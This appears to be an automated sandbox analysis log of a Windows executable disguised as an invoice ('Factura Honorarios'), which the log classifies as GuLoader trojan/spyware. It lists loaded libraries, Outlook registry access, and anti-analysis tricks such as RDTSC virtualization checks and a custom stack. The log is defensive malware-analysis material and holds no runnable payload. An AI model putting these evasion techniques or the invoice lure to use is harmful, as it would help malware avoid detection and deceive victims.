          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_393929113_2_39392911
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_393909E13_2_393909E1
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_39390A103_2_39390A10
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_39390D7A3_2_39390D7A
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_39392FFA3_2_39392FFA
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_393900273_2_39390027
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_393900403_2_39390040
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_393922293_2_39392229
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_394838D03_2_394838D0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_394891303_2_39489130
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_39481A203_2_39481A20
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_394826383_2_39482638
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: String function: 00402C41 appears 51 times
          Source: Factura Honorarios 2024-11-17.exe, 00000000.00000000.1405150029.000000000044D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamepillowber swing.exeDVarFileInfo$ vs Factura Honorarios 2024-11-17.exe
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2663301435.0000000005999000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Factura Honorarios 2024-11-17.exe
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000000.1869133233.000000000044D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamepillowber swing.exeDVarFileInfo$ vs Factura Honorarios 2024-11-17.exe
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683754964.0000000035CC7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Factura Honorarios 2024-11-17.exe
          Source: Factura Honorarios 2024-11-17.exeBinary or memory string: OriginalFilenamepillowber swing.exeDVarFileInfo$ vs Factura Honorarios 2024-11-17.exe
          Source: Factura Honorarios 2024-11-17.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/6@5/5
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403359
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_00403359
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 0_2_004046EC GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004046EC
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 0_2_00402104 CoCreateInstance,0_2_00402104
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeMutant created: NULL
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeFile created: C:\Users\user\AppData\Local\Temp\nsk8B7C.tmpJump to behavior
          Source: Factura Honorarios 2024-11-17.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: Factura Honorarios 2024-11-17.exeReversingLabs: Detection: 31%
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeFile read: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe "C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe"
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess created: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe "C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe"
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess created: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe "C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: riched20.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: usp10.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: Factura Honorarios 2024-11-17.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

          Data Obfuscation

          barindex
          Yara detected GuLoader
          Source: Yara matchFile source: 00000000.00000002.1873262256.0000000006B16000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 0_2_6FF41B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6FF41B63
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 0_2_6FF42FD0 push eax; ret 0_2_6FF42FFE
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_3_0019CA98 pushfd ; retf 0019h3_3_0019CA99
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_3_0019EE18 push eax; iretd 3_3_0019EE65
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_3_0019EE8C push eax; iretd 3_3_0019EEA9
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_3_0019CF4C push eax; iretd 3_3_0019CF4D
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_00159C30 push esp; retf 0017h3_2_00159D55
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeFile created: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Switches to a custom stack to bypass stack traces
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeAPI/Special instruction interceptor: Address: 70A64CD
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeAPI/Special instruction interceptor: Address: 3C164CD
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeRDTSC instruction interceptor: First address: 7069CA9 second address: 7069CA9 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F682CC511A3h 0x00000006 test cx, dx 0x00000009 inc ebp 0x0000000a test cl, dl 0x0000000c inc ebx 0x0000000d cmp al, cl 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeRDTSC instruction interceptor: First address: 3BD9CA9 second address: 3BD9CA9 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F682C69C2F3h 0x00000006 test cx, dx 0x00000009 inc ebp 0x0000000a test cl, dl 0x0000000c inc ebx 0x0000000d cmp al, cl 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeMemory allocated: 35F50000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeMemory allocated: 35CD0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 599890Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 599781Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 599672Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 599562Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 599453Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 599343Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 599234Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 599125Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 599015Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 598906Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 598797Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 598687Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 598578Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 598469Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 598359Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 598250Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 598140Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 598031Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 597922Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 597812Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 597703Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 597590Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 597437Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 597288Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 597187Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 597078Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 596968Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 596859Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 596750Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 596640Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 596531Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 596422Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 596312Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 596203Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 596093Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 595984Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 595873Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 595765Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 595656Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 595547Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 595437Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 595328Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 595219Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 595094Jump to behavior
